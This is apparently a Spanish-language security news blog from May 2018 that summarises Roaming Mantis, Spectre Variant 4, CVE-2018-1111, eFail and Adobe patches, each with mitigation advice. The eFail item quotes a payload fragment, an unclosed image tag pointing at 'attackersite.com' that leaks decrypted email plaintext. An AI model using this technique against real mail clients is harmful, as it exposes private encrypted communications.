22.5.18

Virus ataca a usuarios de iOS y Android



El malware Roaming Mantis, fue descubierto secuestrando los enrutadores de Internet para distribuir malware de banca Android diseñado para robar las credenciales de inicio de sesión de los usuarios y el código secreto para la autenticación.

La campaña Roaming Mantis, ha ampliado sus objetivos al agregar ataques de phishing para dispositivos iOS y script de minería de cifrado para usuarios de PC.

El nuevo malware, se distribuye mediante el secuestro de DNS, donde los atacantes cambian la configuración DNS de los enrutadores inalámbricos para redirigir el tráfico a sitios web maliciosos controlados por ellos.

Por lo tanto, cada vez que los usuarios intentan acceder a cualquier sitio web a través de un enrutador comprometido, se les redirige a sitios web deshonestos, como: aplicaciones falsas infectadas con malware bancario para usuarios de Android y sitios de phishing para usuarios de iOS.

Una vez instalados, los atacantes pueden controlar los dispositivos infectados de Android usando 19 comandos internos incorporados, como: sendSms, setWifi, gcont, lock, onRecordAction, call, get_apps, ping, entre otros.

Si las víctimas poseen un dispositivo iOS, el malware redirige a los usuarios a un sitio de phishing que imita el sitio web de Apple, afirmando ser “security.app.com”, y les pide que ingresen su identificación de usuario, contraseña, número de tarjeta y fecha de vencimiento de la tarjeta. y número CVV.

Para protegerse de dicho malware, se le recomienda asegurarse de que el enrutador ejecute la última versión del firmware y esté protegido con una contraseña segura.

Se recomienda a los usuarios de dispositivos Android que instalen aplicaciones en tiendas oficiales.

Para verificar si su enrutador Wi-Fi ya está comprometido, revise su configuración de DNS y verifique la dirección del servidor DNS. Si no coincide con el emitido por su proveedor, cámbielo a la correcta. También cambie todas las contraseñas de su cuenta de inmediato.

Fuente: The Hacker News 

Vulnerabilidades Spectre y Meltdown siguen atacando a Intel, AMD, ARM.

Se reveló la última falla de Variante 4 que afecta a los núcleos de procesador modernos de Intel, AMD y ARM, así como a las CPU Power 8, Power 9 y System z de IBM, que amenazan casi todas las PC, computadoras portátiles, teléfonos inteligentes, tabletas y dispositivos electrónicos integrados, independientemente del fabricante o sistema operativo.
El ataque especulativo Store Bypass hasta ahora se ha demostrado en un "language-based runtime environment". El uso más común de los tiempos de ejecución, como JavaScript, es en los navegadores web, pero Intel no ha visto ninguna evidencia de exploits basados ​​en exploradores exitosos.
Intel ha clasificado la Variante 4 como de "riesgo medio" porque muchos de los exploits en el ataque de desvío  que explotaría fueron corregidos por navegadores como Safari, Edge y Chrome durante el conjunto inicial de parches.
Al mismo tiempo, investigadores de Google y Microsoft también descubrieron la variante 3A, denominada "Rogue System Register Read", una variación de Meltdown que permite a los atacantes con acceso local a un sistema utilizar el análisis de canales laterales y leer datos confidenciales y otros parámetros del sistema.


Mitigación
La mitigación se desactivará por defecto, proporcionando a los clientes la opción de habilitarlo o no. Si está habilitado, Intel observó un impacto en el rendimiento de aproximadamente 2 a 8 por ciento en los puntajes generales de los puntos de referencia, como "índice interanual SYSmark 2014 SE y SPEC en los sistemas de prueba de clientes y servidores".
AMD lanzó un documento técnico, que aconseja a los usuarios que dejen la solución desactivada debido a la dificultad inherente de realizar un ataque de Bypass de tienda especulativo exitoso.
Recomendación
Todos los usuarios deben aplicar buenas prácticas de seguridad para que se protejan contra el malware y a su vez garantizar que su software esté actualizado.


Fuente: The Hacker News 

16.5.18

Se revelan accidentalmente dos días cero en desarrollo



Accidentalmente hackers expusieron sin darse cuenta dos días cero operativos, mientras cargaban un archivo PDF armando un motor de análisis de malware público.

El investigador de ESET que descubrió los días cero ocultos en el mar de muestras de malware, cree que atrapó los días cero mientras los misteriosos hackers seguían trabajando para afinar sus hazañas.

Los dos días cero fueron identificados como: CVE-2018-4990, que afectan al visualizador de Adobe Acrobat / Reader PDF, y CVE-2018-8120, que afectan al componente Win32k de Windows.

Los dos días cero están destinados a ser utilizados en conjunto y forman una llamada "exploit chain.".

"El ejemplo malicioso de PDF incorpora código JavaScript que controla todo el proceso de explotación. Una vez que se abre el archivo PDF, se ejecuta el código JavaScript" explica el investigador de ESET.

La cadena de exploits, es una obra maestra de piratería ofensiva, pero nunca sería tan peligrosa como podría haber sido por un error operativo que sus creadores cometieron al cargarlo en un conocido motor de exploración de virus con la esperanza de probar su nivel de detección.

Actualmente ambos días cero están parchado. Microsoft parchó CVE-2018-8120 y Adobe parchó CVE-2018-4990 en APSB18-09.



Fuente: bleepingcomputer.com

Red Hat Linux: Vulnerabilidad CVE-2018-1111


Investigador de Google descubrió una vulnerabilidad crítica de inyección remota de comandos en la implementación del cliente DHCP de Red Hat Linux y sus derivados, como el sistema operativo Fedora.
La vulnerabilidad, rastreada como CVE-2018-1111, podría permitir a los atacantes ejecutar comandos arbitrarios con privilegios de administrador en sistemas específicos.
Siempre que su sistema se una a una red, es la aplicación cliente DHCP la que le permite a su sistema recibir automáticamente parámetros de configuración de red, como una dirección IP y servidores DNS, desde el servidor DHCP (Protocolo de control de host dinámico).
La vulnerabilidad reside en el script de integración de NetworkManager incluido en los paquetes de cliente DHCP que está configurado para obtener la configuración de red utilizado el protocolo DHCP.

Distribuidores Linux
Otras distribuciones de Linux como OpenSUSE y Ubuntu no parecen verse afectadas por la vulnerabilidad, ya que su implementación de cliente DHCP no tiene el script de integración de NetworkManager de manera predeterminada.

Mitigación
Se ha lanzado un código de exploits tweetable de prueba de concepto para la vulnerabilidad del cliente DHCP de Red Hat Linux en Twitter.
En el aviso de seguridad, Red Hat ha confirmado que la vulnerabilidad afecta a Red Hat Enterprise Linux 6 y 7, y que todos sus clientes que ejecutan versiones de afecto del paquete dhclient deben actualizar sus paquetes a las versiones más nuevas tan pronto como estén disponibles.
Fedora también ha lanzado nuevas versiones de paquetes DHCP que contienen correcciones para Fedora 26, 27 y 28.

Recomendación
Los usuarios tienen la opción de eliminar o desactivar el script vulnerable, pero esto evitará que ciertos parámetros de configuración proporcionados por el servidor DHCP se configuren en un sistema local, como las direcciones de los servidores NTP o NIS locales, advierte Red Hat.
Fuente: The Hacker News 

15.5.18

EFail Ataca PGP y correos electrónicos encriptados S/MIME



PGP y S/MIME son estándares populares de encriptación de extremo a extremo utilizados para encriptar correos electrónicos de una manera que nadie, ni siquiera la compañía, el gobierno o los ciberdelincuentes, pueden espiar su comunicación.

Debemos tener en cuenta que la falla no reside en los estándares de cifrado del correo electrónico.

Apodados eFail por los investigadores, las vulnerabilidades, podrían permitir que los atacantes descifren el contenido de sus correos electrónicos cifrados de extremo a extremo en texto sin formato, incluso para los mensajes enviados en el pasado.

las vulnerabilidades existen en la forma en que los clientes de correo cifrado manejan correos electrónicos HTML y recursos externos, como la carga de imágenes, estilos de URL externas.

Los clientes de correo electrónico suelen estar configurados para descifrar automáticamente el contenido de los correos electrónicos cifrados que usted recibe, pero si su cliente también está configurado para cargar recursos externos automáticamente, los atacantes pueden abusar de este comportamiento para robar mensajes en texto simple.

El vector de ataque requiere texto plano inyectado en el correo encriptado, y luego usando el exploit, se filtrarán los datos originalmente encriptados tan pronto como el cliente de correo del destinatario acceda (o descifre) el mensaje.

Cabe señalar que para realizar un ataque de eFail, un atacante debe tener acceso a sus correos electrónicos encriptados, que luego se modifican y se envían de vuelta para engañar a su cliente de correo electrónico y revelarle el mensaje secreto al atacante remoto. sin avisarte.
En el correo electrónico recientemente compuesto, el atacante agrega una etiqueta de imagen no cerrada, como esta "imgsrc= "https ://attackersite.com/ justo antes del contenido encriptado y lo finaliza a gregando el final de la etiqueta de imagen, como este: “jpg ".

Cuando su cliente de correo electrónico vulnerable recibe este mensaje, descifra la parte encriptada del mensaje dado en el medio, y luego automáticamente intenta mostrar el contenido HTML, es decir, la etiqueta de la imagen con todo el texto descifrado como el nuevo nombre de la imagen

Como su cliente de correo electrónico intentará cargar la imagen desde el servidor controlado por el atacante, el atacante puede capturar esta solicitud entrante, donde el nombre de archivo contiene el contenido completo del correo electrónico encriptado original en texto sin formato.

Los investigadores también aconsejan a los usuarios que adopten un algoritmo de cifrado autenticado para la comunicación confidencial.


Fuente: The Hacker News 

Adobe Lanza actualizaciones que parchean 48 vulnerabilidades


Adobe acaba de lanzar nuevas versiones de Acrobat DC, Reader y Photoshop CC para Windows y usuarios de macOS que parchean 48 vulnerabilidades en su software.

Un total de 47 vulnerabilidades afectan a las aplicaciones Adobe Acrobat y Reader, y se corrigió un error crítico en la ejecución del código remoto en Adobe Photoshop CC.

 Adobe Acrobat y Reader son afectadas por 24 vulnerabilidades críticas, categorizadas como Double Free, Heap Overflow, Use-after-free, Out-of-bounds write, Type Confusion, que si se explotan, podrían permitir arbitrarias ejecuciones del código en el contexto del usuario objetivo.

El resto de los 23 fallos, que incluyen el desvío de seguridad, lectura fuera de límites, daños en la memoria, robo de hash NTLM SSO e inyección de línea  POST HTTP, a través de envío XFA, están marcados como importantes y pueden conducir a divulgación de información o desvío de seguridad.

Las vulnerabilidades mencionadas anteriormente afectan las versiones de Windows y macOS de Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017 y  Acrobat Reader 2017.

Nivel de Criticidad

Los últimos parches de Adobe Acrobat y Reader han recibido una calificación de prioridad de "1", lo que significa que los defectos son más propensos a ser explotados en su naturaleza.

Vulnerabilidad de Photoshop

La vulnerabilidad (CVE-2018-4946) afecta a Photoshop CC 2018 versión 19.1.3 y versiones anteriores de 19.x, así como a Photoshop CC 2017 versión 18.1.3 y versiones anteriores 18.x.

Mitigación

Los defectos han sido tratados en Acrobat DC y Acrobat Reader DC versión 2018.011.20040, Acrobat 2017 y Acrobat Reader DC 2017 versión 2017.011.30080, así como en Acrobat Reader DC (Classic 2015) y Acrobat DC (Classic 2015), versión 2015.006.30418.

Adobe también ha lanzado parches de seguridad para las versiones de Windows y macOS de Photoshop CC para abordar una vulnerabilidad crítica, categorizada como problema de "out-of-bounds write".

Recomendación

Los usuarios deben actualizar su software lo antes posible.



Fuente: The Hacker News

14.5.18

Google hace que Android despliegue actualizaciones obligatorias




Los usuarios de Android no reciben las últimas actualizaciones de parches de seguridad con regularidad.


Dado que Google no tenía control directo sobre el firmware de la marca OEM de Android, que se ejecuta en miles de millones de dispositivos, trajo algunos cambios significativos a la arquitectura del sistema Android el año pasado con Project Treble para tener más control sobre el proceso de actualización.

El problema con la actualización de seguridad continúa debido a que los OEM no entregan todos los parches regularmente y de manera oportuna, dejando partes del ecosistema de Android expuestas a los piratas informáticos.

A partir del lanzamiento de Android P, Google obligará a los fabricantes a implementar actualizaciones de seguridad regulares para sus teléfonos inteligentes.

El jefe de seguridad de la plataforma Android, David Kleidermacher, reveló que la compañía había modificado sus acuerdos OEM para incluir provisiones para parches de seguridad regulares para todos los dispositivos, en la Developer Conference.

"También hemos trabajado en la construcción de parches de seguridad en nuestros acuerdos OEM. Esto llevará a un aumento masivo de la cantidad de dispositivos y usuarios que reciben parches de seguridad regulares", dijeron los desarrolladores de XDA citando a Kleidermacher.

Por ahora, no existen muchos detalles sobre el acuerdo actualizado con socios de Android, pero los nuevos cambios realizados por Google definitivamente tendrán un impacto masivo en el estado general de la seguridad de Android y beneficiarán a millones de usuarios de Android.
Fuente: The Hacker News